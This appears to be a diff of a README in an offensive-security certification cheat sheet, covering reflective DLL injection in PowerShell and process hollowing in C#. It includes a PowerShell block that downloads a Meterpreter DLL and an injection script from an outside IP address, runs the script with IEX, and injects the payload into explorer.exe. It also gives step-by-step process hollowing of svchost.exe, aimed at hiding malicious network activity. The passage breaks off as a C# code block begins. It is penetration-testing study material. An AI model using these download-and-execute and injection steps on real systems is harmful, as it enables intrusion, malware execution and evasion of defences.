peterkhe1999/CheatSheet/OSEP/README.md

 ## Reflective DLL Injection in PowerShell

-Reflective DLL injection parses the relevant fields of the DLL's Portable Executable1 (PE) file format and maps the contents into memory.
+Reflective DLL injection parses the relevant fields of the DLL's Portable Executable (`PE`) file format and maps the contents into memory.

-The PowerShell reflective DLL injection script (**Invoke-ReflectivePEInjection**) performs reflection to avoid writing assemblies to disk, after which it parses the desired PE file.
+The PowerShell reflective DLL injection script `Invoke-ReflectivePEInjection` performs reflection to avoid writing assemblies to disk, after which it parses the desired PE file.

 It has 2 separate modes:

-1. Reflectively load a DLL or EXE into the same process
+1. Reflectively load a `DLL` or `EXE` into the same process

 2. Load a DLL into a remote process.

 Inject an unmanaged Meterpreter DLL into a process

 ```pwsh
 $bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.45.179/met.dll')

 $procid = (Get-Process -Name explorer).Id

 # Import-Module C:\Tools\Invoke-ReflectivePEInjection.ps1
 IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.45.179/Invoke-ReflectivePEInjection.ps1'))

 Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid
 ```

 ## Process Hollowing in C#

-We are generating network activity from processes that generally do not generate it. => migrate to `svchost.exe`
+We are generating network activity from processes that generally do not generate it => migrate to `svchost.exe`.

-All `svchost.exe` processes run by default at **SYSTEM** integrity level, meaning we cannot inject into them from a lower integrity level.
+All `svchost.exe` processes run by default at `SYSTEM` integrity level => We cannot inject into them from a lower integrity level.

-Additionally, if we were to launch `svchost.exe` (instead of Notepad) and attempt to inject into it, the process will immediately terminate.
+If we launch `svchost.exe` and attempt to inject into it, the process will immediately terminate.

 => Launch a `svchost.exe` process and modify it before it actually starts executing.

-Supply the **CREATE_SUSPENDED** flag (0x4) when calling **CreateProcess**, the execution of the thread is halted just before it runs the EXE's first instruction.
+1. Supply the `CREATE_SUSPENDED` flag (`0x4`) when calling `CreateProcess`, the execution of the thread is halted just before it runs the EXE's first instruction.

-Locate the EntryPoint of the executable and overwrite its in-memory content with our staged shellcode and let it continue to execute.
+2. Locate the `EntryPoint` of the executable and overwrite its in-memory content with our staged shellcode and let it continue to execute.

-To read from a remote process, use the **ReadProcessMemory** API, which is a counterpart to WriteProcessMemory.
+3. To read from a remote process, use the `ReadProcessMemory` API, which is a counterpart to `WriteProcessMemory`.

-Use **WriteProcessMemory** to overwrite the original content with our shellcode.
-Then let the execution of the thread inside the remote process continue.
+4. Use `WriteProcessMemory` to overwrite the original content with our shellcode.

+5. Let the execution of the thread inside the remote process continue.

 ```csharp
 using System;